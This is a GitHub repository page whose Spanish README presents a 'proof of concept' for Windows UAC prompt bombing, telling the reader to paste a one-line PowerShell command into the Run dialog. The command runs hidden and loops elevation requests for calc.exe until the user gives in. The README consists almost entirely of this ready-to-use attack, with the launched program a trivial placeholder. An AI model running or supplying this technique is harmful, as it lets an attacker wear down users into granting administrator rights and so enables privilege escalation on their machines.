Skip to content

alan-baigorria/poc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 

Repository files navigation

poc

Proof of concept

Windows UAC PROMPT BOMBING

WINDOWS + R

PEGA ESTO:
powershell.exe -WindowStyle Hidden while (1) { try { Start-Process calc.exe -Verb RunAs ; break } catch { Get-Item "+" }}

About

Proof of concepts

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors